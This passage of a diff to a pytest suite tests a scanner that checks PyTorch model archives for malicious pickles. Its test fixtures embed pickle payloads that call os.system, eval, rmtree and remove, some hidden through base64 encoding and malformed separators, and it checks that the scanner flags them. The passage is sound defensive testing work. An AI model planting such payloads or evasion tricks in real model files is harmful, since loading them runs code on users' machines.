_float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + storage_blob = b"N.!cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) - report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) +def test_scan_file_scans_malformed_separator_after_security_opcode_prefix(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N.cfoo\nbar\n\xffcposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_scans_scalar_literal_with_encoded_nested_pickle(tmp_path: Path) -> None: +def test_scan_file_scans_encoded_pickle_after_malformed_separator(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"S'" + base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") + b"'\n." + nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") + storage_blob = b"N.!S'" + nested_payload + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_encoded_pickle_after_repeated_malformed_separator(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") + storage_blob = b"N.ZZS'" + nested_payload + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_encoded_pickle_after_mixed_malformed_separators(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") + storage_blob = b"N.#@S'" + nested_payload + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_skips_repeated_malformed_separator_literal_near_match(tmp_path: Path) -> None: + _assert_separator_near_match_unrecognized(tmp_path, b"N.ZZS'benign-token'\n.") + + +def test_scan_file_routes_binunicode_literal_with_repeated_line_continuations(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"\x80\x02" + _binunicode(b"os\\\n\\\n.system('id') ") + b"." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7274,21 +6629,36 @@ def test_scan_file_scans_scalar_literal_with_encoded_nested_pickle(tmp_path: Pat report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.verdict == SafetyVerdict.SUSPICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] assert any( - finding.rule_code == "DANGEROUS_CALL" + finding.rule_code == "SUSPICIOUS_STRING" and finding.location is not None and f"{archive_path}:archive/data/0" in finding.location for finding in report.findings ) -def test_scan_file_scans_padded_base64_scalar_before_following_token(tmp_path: Path) -> None: +@pytest.mark.parametrize( + ("tail", "expected_verdict"), + [ + (b"!\x80\x04N.!cposix\nsystem\n(S'echo hidden'\ntR.", SafetyVerdict.MALICIOUS), + ( + b"!" + + (b"\x80\x04N." * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + + b"!cposix\nsystem\n(S'echo hidden'\ntR.", + SafetyVerdict.UNKNOWN, + ), + ], + ids=["after-benign-binary-candidate", "after-candidate-budget"], +) +def test_scan_file_scans_malformed_separator_after_benign_binary_candidates( + tmp_path: Path, + tail: bytes, + expected_verdict: SafetyVerdict, +) -> None: archive_path = tmp_path / "model.pt" - malicious = base64.b64encode(b"cposix\nsystem\n)R.") - assert malicious.endswith(b"=") - storage_blob = b"S'" + malicious + base64.b64encode(b"benign") + b"'\n." + storage_blob = b"N." + tail storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7298,21 +6668,23 @@ def test_scan_file_scans_padded_base64_scalar_before_following_token(tmp_path: P report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert report.verdict == expected_verdict + if expected_verdict is SafetyVerdict.MALICIOUS: + assert any( + finding.rule_code == "DANGEROUS_CALL" + and finding.location is not None + and f"{archive_path}:archive/data/0" in finding.location + for finding in report.findings + ) + else: + assert report.status == ScanStatus.INCONCLUSIVE + assert any(notice.code == "parse_incomplete" for notice in report.notices) -def test_scan_file_scans_padded_base64_scalar_before_short_suffix(tmp_path: Path) -> None: +def test_scan_file_reports_large_malformed_separator_tensor_noise_incomplete(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - malicious = base64.b64encode(b"cposix\nsystem\n)R.") - assert malicious.endswith(b"=") - storage_blob = b"S'" + malicious + b"AAAA" + b"'\n." + storage_blob = b"N." + (b"\xff" * 100_000) storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7322,23 +6694,20 @@ def test_scan_file_scans_padded_base64_scalar_before_short_suffix(tmp_path: Path report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.UNKNOWN assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert any(notice.code == "parse_incomplete" for notice in report.notices) -def test_scan_file_scans_padded_base64_scalar_between_following_tokens(tmp_path: Path) -> None: +def test_scan_file_skips_malformed_separator_tensor_noise_near_match(tmp_path: Path) -> None: + _assert_separator_tensor_noise_unrecognized(tmp_path, 100) + + +def test_scan_file_scans_malformed_separator_unicode_literal_nested_pickle(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - safe_prefix = base64.b64encode(b"safe") - malicious = base64.b64encode(b"cposix\nsystem\n)R.") - assert safe_prefix.endswith(b"=") - assert malicious.endswith(b"=") - storage_blob = b"S'" + safe_prefix + malicious + base64.b64encode(b"benign") + b"'\n." + encoded = base64.b64encode(b"cbuiltins\neval\n(S'1'\ntR.") + storage_blob = b"N.!V" + encoded + b"\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7351,16 +6720,20 @@ def test_scan_file_scans_padded_base64_scalar_between_following_tokens(tmp_path: assert report.verdict == SafetyVerdict.MALICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] assert any( - finding.rule_code == "DANGEROUS_CALL" + finding.rule_code == "S601" and finding.location is not None and f"{archive_path}:archive/data/0" in finding.location for finding in report.findings ) -def test_scan_file_skips_padded_base64_scalar_near_match(tmp_path: Path) -> None: +def test_scan_file_skips_large_proto0_global_like_tensor_noise(tmp_path: Path) -> None: + _assert_separator_tensor_noise_unrecognized(tmp_path, 100_000) + + +def test_scan_file_skips_encoded_marker_density_scalar_tensor_noise(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"S'" + base64.b64encode(b"safe") + base64.b64encode(b"benign") + b"'\n." + storage_blob = _proto0_string_literal(b"a" * 512) storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7375,718 +6748,57 @@ def test_scan_file_skips_padded_base64_scalar_near_match(tmp_path: Path) -> None assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -def test_scan_file_skips_padded_base64_scalar_short_suffix_near_match(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"S'" + base64.b64encode(b"safe") + b"AAAA" + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) +def test_trailing_candidate_raw_scan_bounds_invalid_marker_attempts(monkeypatch: pytest.MonkeyPatch) -> None: + original = package_api._has_security_relevant_pickle_opcode - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + counted_has_security_relevant_pickle_opcode = create_autospec(original, side_effect=original) + monkeypatch.setattr( + package_api, + "_has_security_relevant_pickle_opcode", + counted_has_security_relevant_pickle_opcode, + ) -def test_scan_file_skips_multiple_padded_base64_scalar_near_match(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = ( - b"S'" + base64.b64encode(b"safe") + base64.b64encode(b"public") + base64.b64encode(b"benign") + b"'\n." + assert ( + package_api._trailing_candidate_has_raw_nested_security_pickle(b"c" * 100_000, sample_is_prefix=False) is False ) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + assert counted_has_security_relevant_pickle_opcode.call_count <= package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - report = scan_file(archive_path) - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] +def test_trailing_candidate_raw_scan_fails_closed_after_candidate_budget() -> None: + value = ( + b"c!" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1) + + (b"X" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES + 10)) + + b"cos\nremove\n(S'/tmp/test'\ntR." + ) + assert package_api._trailing_candidate_has_raw_nested_security_pickle(value, sample_is_prefix=False) is True -def test_scan_file_fails_closed_for_encoded_nested_pickle_after_candidate_budget(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = b"cshutil\nrmtree\n(S'/tmp/modelaudit'\ntR." - encoded_payload = base64.b64encode( - (b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + (b"Z" * 9000) + nested_payload + +def test_trailing_candidate_raw_scan_preserves_outer_prefix_state() -> None: + assert package_api._trailing_candidate_has_raw_nested_security_pickle(b"!\x80\x04N", sample_is_prefix=True) is True + assert ( + package_api._trailing_candidate_has_raw_nested_security_pickle(b"!\x80\x04N", sample_is_prefix=False) is False ) - storage_blob = b"S'" + encoded_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - report = scan_file(archive_path) - assert report.verdict != SafetyVerdict.CLEAN - assert "archive/data/0" in report.metadata["pickle_files"] +def test_security_opcode_probe_skips_repeated_none_streams_linearly(monkeypatch: pytest.MonkeyPatch) -> None: + call_count = 0 + original_genops = package_api.pickletools.genops + def counted_genops(sample: bytes) -> collections.abc.Iterator[Any]: + nonlocal call_count + call_count += 1 + yield from original_genops(sample) -def test_scan_file_scans_shifted_base64_scalar_literal_nested_pickle(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob = b"S'" + (b"A" * 65) + base64.b64encode(nested_payload) + (b"A" * 64) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + monkeypatch.setattr(package_api.pickletools, "genops", counted_genops) - report = scan_file(archive_path) + assert package_api._has_security_relevant_pickle_opcode(b"N." * 1200 + b"cposix\nsystem\n(S'echo hidden'\ntR.") + assert call_count <= 2 - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - -def test_scan_file_scans_scalar_literal_before_trailing_trivial_stream(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob = b"S'" + base64.b64encode(nested_payload) + b"'\n.N." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_scalar_literal_after_trivial_stream(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob = b"N.S'" + base64.b64encode(nested_payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_scalar_literal_after_clean_nontrivial_stream(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob = b"N.]\x85.S'" + base64.b64encode(nested_payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_preserves_suspicious_literal_after_trivial_stream(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N.]S'__reduce__'\na." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert "archive/data/0" in report.metadata["pickle_files"] - assert any( - finding.rule_code == "SUSPICIOUS_STRING" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_scalar_literal_after_benign_binary_prefix(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = _proto0_string_literal(b"\x80\x04N.\xffcposix\nsystem\n(S'echo hidden'\ntR.") - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_scalar_literal_with_escaped_binary_nested_pickle(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = _proto0_string_literal(pickle.dumps(MaliciousPayload(), protocol=4)) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_scalar_literal_with_suspicious_string(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"S'eval('\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "SUSPICIOUS_STRING" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_continues_literal_inspection_after_surrogate_unicode(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"V\\ud800\nS'os.system'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.UNKNOWN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any(notice.code == "parse_incomplete" and notice.location is not None for notice in report.notices) - - -def test_scan_file_scans_scalar_literal_with_magic_method_suspicious_string(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"S'__reduce__'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "SUSPICIOUS_STRING" - and finding.details.get("pattern") == "magic method" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_initial_scalar_literal_split_at_trusted_probe_boundary(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_prefix = b"S'" + (b"A" * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"S'"))) - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + base64.b64encode(nested_payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_frame_first_scalar_literal_with_encoded_nested_pickle(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") - frame_payload = b"\x8c" + bytes([len(nested_payload)]) + nested_payload + b"." - storage_blob = b"\x95" + len(frame_payload).to_bytes(8, "little") + frame_payload - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_malformed_separator_before_security_pickle(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N.!cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_malformed_separator_after_security_opcode_prefix(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N.cfoo\nbar\n\xffcposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_encoded_pickle_after_malformed_separator(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") - storage_blob = b"N.!S'" + nested_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_encoded_pickle_after_repeated_malformed_separator(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") - storage_blob = b"N.ZZS'" + nested_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_encoded_pickle_after_mixed_malformed_separators(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") - storage_blob = b"N.#@S'" + nested_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_skips_repeated_malformed_separator_literal_near_match(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N.ZZS'benign-token'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] - - -def test_scan_file_routes_binunicode_literal_with_repeated_line_continuations(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"\x80\x02" + _binunicode(b"os\\\n\\\n.system('id') ") + b"." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "SUSPICIOUS_STRING" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -@pytest.mark.parametrize( - ("tail", "expected_verdict"), - [ - (b"!\x80\x04N.!cposix\nsystem\n(S'echo hidden'\ntR.", SafetyVerdict.MALICIOUS), - ( - b"!" - + (b"\x80\x04N." * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) - + b"!cposix\nsystem\n(S'echo hidden'\ntR.", - SafetyVerdict.UNKNOWN, - ), - ], - ids=["after-benign-binary-candidate", "after-candidate-budget"], -) -def test_scan_file_scans_malformed_separator_after_benign_binary_candidates( - tmp_path: Path, - tail: bytes, - expected_verdict: SafetyVerdict, -) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + tail - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert report.verdict == expected_verdict - if expected_verdict is SafetyVerdict.MALICIOUS: - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - else: - assert report.status == ScanStatus.INCONCLUSIVE - assert any(notice.code == "parse_incomplete" for 